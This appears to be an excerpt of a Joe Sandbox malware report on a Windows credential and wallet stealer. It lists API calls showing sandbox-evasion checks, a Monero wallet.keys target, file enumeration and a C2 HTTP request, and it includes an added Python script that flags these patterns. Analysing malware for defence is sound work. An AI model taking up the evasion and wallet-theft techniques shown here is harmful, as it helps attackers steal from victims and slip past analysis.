                              • Instruction Fuzzy Hash: E14193B1D1424CABDF10DF94DC45BEEBBB8EF48704F100199F609A7280DB786A45CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0768), ref: 009F98A1
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0798), ref: 009F98BA
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B07C8), ref: 009F98D2
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B07E0), ref: 009F98EA
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0648), ref: 009F9903
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B8870), ref: 009F991B
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013A6400), ref: 009F9933
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013A6380), ref: 009F994C
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B06C0), ref: 009F9964
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0780), ref: 009F997C
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0708), ref: 009F9995
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B07B0), ref: 009F99AD
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013A65E0), ref: 009F99C5
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0738), ref: 009F99DE
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009E11D0: ExitProcess.KERNEL32 ref: 009E1211
                                • Part of subcall function 009E1160: GetSystemInfo.KERNEL32(?), ref: 009E116A
                                • Part of subcall function 009E1160: ExitProcess.KERNEL32 ref: 009E117E
                                • Part of subcall function 009E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009E112B
                                • Part of subcall function 009E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 009E1132
                                • Part of subcall function 009E1110: ExitProcess.KERNEL32 ref: 009E1143
                                • Part of subcall function 009E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009E123E
                                • Part of subcall function 009E1220: __aulldiv.LIBCMT ref: 009E1258
                                • Part of subcall function 009E1220: __aulldiv.LIBCMT ref: 009E1266
                                • Part of subcall function 009E1220: ExitProcess.KERNEL32 ref: 009E1294
                                • Part of subcall function 009F6770: GetUserDefaultLangID.KERNEL32 ref: 009F6774
                                • Part of subcall function 009E1190: ExitProcess.KERNEL32 ref: 009E11C6
                                • Part of subcall function 009F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009E11B7), ref: 009F7880
                                • Part of subcall function 009F7850: RtlAllocateHeap.NTDLL(00000000), ref: 009F7887
                                • Part of subcall function 009F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009F789F
                                • Part of subcall function 009F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7910
                                • Part of subcall function 009F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009F7917
                                • Part of subcall function 009F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009F792F
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 009F6AF9
                              • Sleep.KERNEL32(00001770), ref: 009F6B04
                              • CloseHandle.KERNEL32(?,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6B1A
                              • ExitProcess.KERNEL32 ref: 009F6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 9da20c16bd431dd22bed16d5adf90c77b043a3d62d08e1d8d1cc846069d1fbe2
                              • Instruction ID: 52ad0f4bb50729d3fff418598f83691e4b30773bc72084d5a7c13bc5cb818da8
                              • Opcode Fuzzy Hash: 9da20c16bd431dd22bed16d5adf90c77b043a3d62d08e1d8d1cc846069d1fbe2
                              • Instruction Fuzzy Hash: 6B31EAB191420CABDB05FBE0DC56BFE7778AF84780F104528F316A6191DFB06A45C7A6

                              Control-flow Graph

                              • Control-flow graph of function 9e1220 (basic blocks 9e1220-9e129d; graph figure not preserved)
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009E123E
                              • __aulldiv.LIBCMT ref: 009E1258
                              • __aulldiv.LIBCMT ref: 009E1266
                              • ExitProcess.KERNEL32 ref: 009E1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 3383881169e13fca5fb157edf941ac4d788c1dfb04fd1681badbc5b294e8cb4d
                              • Instruction ID: 0c4b3d83ea305ee8622678ca0b69b556e74d070f0b6e8b090246ffd719cf7325
                              • Opcode Fuzzy Hash: 3383881169e13fca5fb157edf941ac4d788c1dfb04fd1681badbc5b294e8cb4d
                              • Instruction Fuzzy Hash: 30011DB0D44348BBEF10EBE5CC49BAEBB78AB54705F208049E705B62C0D7B49A45CB99

                              Control-flow Graph

                              • Control-flow graph of function 9f6aba (basic blocks 9f6aba-9f6b22; graph figure not preserved)
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 009F6AF9
                              • Sleep.KERNEL32(00001770), ref: 009F6B04
                              • CloseHandle.KERNEL32(?,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6B1A
                              • ExitProcess.KERNEL32 ref: 009F6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: c475010d006219858d8492eb4ab5cf8ceca2586d937adf87ad06015148d0c4e0
                              • Instruction ID: cde0cce8bd0de6c15701e607e3e1cc61605bca10fbcd0ea7e538630517946a8d
                              • Opcode Fuzzy Hash: c475010d006219858d8492eb4ab5cf8ceca2586d937adf87ad06015148d0c4e0
                              • Instruction Fuzzy Hash: C0F05870A5430DABE720ABA0DC0ABBE7B38EF48B02F104914F703E15D1CBB09541DBA6

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 422bd0c6db82e2cdb8237d8b6c960365cc916830b64e0b7efd04ecc0deeee09d
                              • Instruction ID: b8dbfbf189e6e6469acb50d71290cf34cec7b6882b0db980230aac9929f86cd6
                              • Opcode Fuzzy Hash: 422bd0c6db82e2cdb8237d8b6c960365cc916830b64e0b7efd04ecc0deeee09d
                              • Instruction Fuzzy Hash: 71213EB1D00209ABDF14DFA5EC45BDE7B75FB44320F108625FA15A7291EB706A0ACB91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E6280: InternetOpenA.WININET(00A00DFE,00000001,00000000,00000000,00000000), ref: 009E62E1
                                • Part of subcall function 009E6280: StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6303
                                • Part of subcall function 009E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E6335
                                • Part of subcall function 009E6280: HttpOpenRequestA.WININET(00000000,GET,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E6385
                                • Part of subcall function 009E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009E63BF
                                • Part of subcall function 009E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009E63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 794428de3d9ee012958c0f150fbc3e9d0aeda0fafeb18bcc85cd5825bb8a1d15
                              • Instruction ID: 363a4db6b4f7062b2289bc02c27438c6d85efa1cef3fe5ff54a726bfcd56f265
                              • Opcode Fuzzy Hash: 794428de3d9ee012958c0f150fbc3e9d0aeda0fafeb18bcc85cd5825bb8a1d15
                              • Instruction Fuzzy Hash: BF110AB091014CABCB14FF60DD52BFD7338AF90340F508558FA1A4A5A2EF74AB0AC791
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009E112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 009E1132
                              • ExitProcess.KERNEL32 ref: 009E1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: ed458dbef2709be73005bb90b4d5b6ed61d33c89d2075e6361a4d4f831fdaa5e
                              • Instruction ID: c83e190d55bde947702d3bc93f117f9c85f4122543b816bab4e70bc57434fbf9
                              • Opcode Fuzzy Hash: ed458dbef2709be73005bb90b4d5b6ed61d33c89d2075e6361a4d4f831fdaa5e
                              • Instruction Fuzzy Hash: 62E01D7095534CFFE7306BA1DC0EB0D767CEB04B02F104054F709B65D0D6B52A41969D
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009E10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009E10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 538ee9a9e1b93467fd086162168974ecb946c0ce97a116c39bf52f7e944949f7
                              • Instruction ID: d9d029bfcd1f70d854a32533cb4a9a7970c5f88b11fd5e29af274843d9bb5403
                              • Opcode Fuzzy Hash: 538ee9a9e1b93467fd086162168974ecb946c0ce97a116c39bf52f7e944949f7
                              • Instruction Fuzzy Hash: 54F0E271641208BBEB149AA4AC49FBFB7ECE705B15F300848F604E3280D5719E40CAA4
                              APIs
                                • Part of subcall function 009F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7910
                                • Part of subcall function 009F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009F7917
                                • Part of subcall function 009F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009F792F
                                • Part of subcall function 009F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009E11B7), ref: 009F7880
                                • Part of subcall function 009F7850: RtlAllocateHeap.NTDLL(00000000), ref: 009F7887
                                • Part of subcall function 009F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009F789F
                              • ExitProcess.KERNEL32 ref: 009E11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 6baf08cce773b162fa8e9da7c6fdaeb18cb9cf3fe78167d368dd913b4e5f9141
                              • Instruction ID: f8ae2a2d02670dd1ac06e106dfa4eec5d95c4fee3fedbc1a15418ed1a765b862
                              • Opcode Fuzzy Hash: 6baf08cce773b162fa8e9da7c6fdaeb18cb9cf3fe78167d368dd913b4e5f9141
                              • Instruction Fuzzy Hash: D9E012B592430957CE1477F5AC4AB3F329C9B54785F080424FB05D2602FA25E811876A
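The four function records above (the VirtualAllocExNuma/ExitProcess stub, the 0x17C841C0-byte VirtualAlloc/VirtualFree pair, the GetComputerNameA/GetUserNameA collection followed by ExitProcess, and the WinINet GET routine whose reply is compared against "ERROR") are the parts of this report a triage analyst reads first, because they encode the sample's sandbox checks and its C2 transaction. The script below is an added example, not Joe Sandbox or Stealc code: it parses bullet lines in the exact "Name.MODULE(args), ref: ADDR" form this report uses, groups them per function at each "APIs" header, and decodes the raw constants (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE, 0x1F = INTERNET_OPTION_SECURITY_FLAGS, 0x00400100 = INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, all from wininet.h/winnt.h) into findings. The sample input is constructed from the lines on this page; the 256 MiB threshold for calling an allocate-then-free pair a memory-size check, and the reading of VirtualAllocExNuma-then-ExitProcess as an emulator-availability probe, are this example's assumptions, not statements the report makes.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox report and flag
the evasion and C2 patterns visible in this Stealc sample.
Added example; not Joe Sandbox or Stealc code."""
import re
from dataclasses import dataclass

# Constructed sample: API lines copied from the function records on this page.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009E112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 009E1132
• ExitProcess.KERNEL32 ref: 009E1143
APIs
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009E10B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009E10F7
APIs
  • Part of subcall function 009F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009F792F
  • Part of subcall function 009F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009F789F
• ExitProcess.KERNEL32 ref: 009E11C6
APIs
  • Part of subcall function 009E6280: HttpOpenRequestA.WININET(00000000,GET,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E6385
  • Part of subcall function 009E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009E63BF
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5228
"""

@dataclass
class Call:
    name: str
    module: str
    args: list        # raw argument strings exactly as the report prints them
    ref: int          # call-site address
    subcall_of: str   # caller address for "Part of subcall function" lines, else ""

# One bullet line: optional "Part of subcall function X:", Name.MODULE(args), ref: ADDR
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-F]+):\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]+)\s*$")

def parse_report(text):
    """Return one list of Call per function, split at each 'APIs' header."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            sub, name, module, args, ref = m.groups()
            current.append(Call(name, module, args.split(",") if args else [],
                                int(ref, 16), sub or ""))
    return functions

def hexarg(call, i):
    """Argument i as an int; None for '?', string literals or a missing argument."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

# dwFlags bits of HttpOpenRequestA, from wininet.h
HTTP_OPEN_FLAGS = {
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x80000000: "INTERNET_FLAG_RELOAD",
}
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
MIN_SUSPICIOUS_ALLOC = 256 * 1024 * 1024   # threshold is an assumption of this example

def decode_flags(value, table):
    names = [n for bit, n in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)                  # bits not in the table stay as hex
    if rest:
        names.append(f"0x{rest:08X}")
    return "|".join(names) or "0"

def detect(calls):
    """Heuristics over one function's calls; returns human-readable findings."""
    names = {c.name for c in calls}
    findings = []
    if "VirtualAllocExNuma" in names and "ExitProcess" in names:
        findings.append("VirtualAllocExNuma then ExitProcess: NUMA API availability probe "
                        "(emulators lacking it fail the call and the sample quits)")
    if names & {"GetUserNameA", "GetComputerNameA"} and "ExitProcess" in names:
        findings.append("user/computer name read, then ExitProcess: identity blocklist check")
    for c in calls:
        size = hexarg(c, 1)
        if c.name == "VirtualAlloc" and size and size >= MIN_SUSPICIOUS_ALLOC and "VirtualFree" in names:
            findings.append(f"VirtualAlloc of {size:,} bytes then VirtualFree: memory-size sandbox check")
        if c.name == "HttpOpenRequestA":
            findings.append("HttpOpenRequestA flags: " + decode_flags(hexarg(c, 6) or 0, HTTP_OPEN_FLAGS))
        if c.name == "InternetSetOptionA" and hexarg(c, 1) == INTERNET_OPTION_SECURITY_FLAGS:
            findings.append("InternetSetOptionA(INTERNET_OPTION_SECURITY_FLAGS) before HttpSendRequestA")
        if c.name == "StrCmpCA" and "ERROR" in c.args:
            findings.append("C2 response compared against the literal 'ERROR'")
    return findings

if __name__ == "__main__":
    for i, fn in enumerate(parse_report(SAMPLE)):
        print(f"function {i} (first call at {fn[0].ref:08X}):", *detect(fn), sep="\n    ")
```

Run as-is it prints the findings for the four constructed records; pointing `parse_report` at a full report dump gives one finding list per function, which is a quick way to locate the evasion stubs before the entry point is stepped in a debugger. The allocation size 0x17C841C0 decodes to exactly 399,000,000 bytes, which is why the threshold matters: a sandbox VM with less free RAM fails the allocation and never reaches the stealer logic, so detection labs that see only the ExitProcess path should raise the guest memory before rerunning.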
                              APIs
                              • wsprintfA.USER32 ref: 009F38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F38E3
                              • lstrcat.KERNEL32(?,?), ref: 009F3935
                              • StrCmpCA.SHLWAPI(?,00A00F70), ref: 009F3947
                              • StrCmpCA.SHLWAPI(?,00A00F74), ref: 009F395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F3C67
                              • FindClose.KERNEL32(000000FF), ref: 009F3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0dc930088f27e91d2c22c32c6a19ec0e1776b23e34f7590312516d2c262e2226
                              • Instruction ID: 51aec2a465d050d3686c595261778b9b5bf63aaa2b31873b4b724ac97c91f4fa
                              • Opcode Fuzzy Hash: 0dc930088f27e91d2c22c32c6a19ec0e1776b23e34f7590312516d2c262e2226
                              • Instruction Fuzzy Hash: 4CA130B191020CABDB34EB64DC85FFE7378BB88700F048588B60D96581EB759B85CF62
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00A00B32,00A00B2B,00000000,?,?,?,00A013F4,00A00B2A), ref: 009EBEF5
                              • StrCmpCA.SHLWAPI(?,00A013F8), ref: 009EBF4D
                              • StrCmpCA.SHLWAPI(?,00A013FC), ref: 009EBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EC7BF
                              • FindClose.KERNEL32(000000FF), ref: 009EC7D1
                              Strings
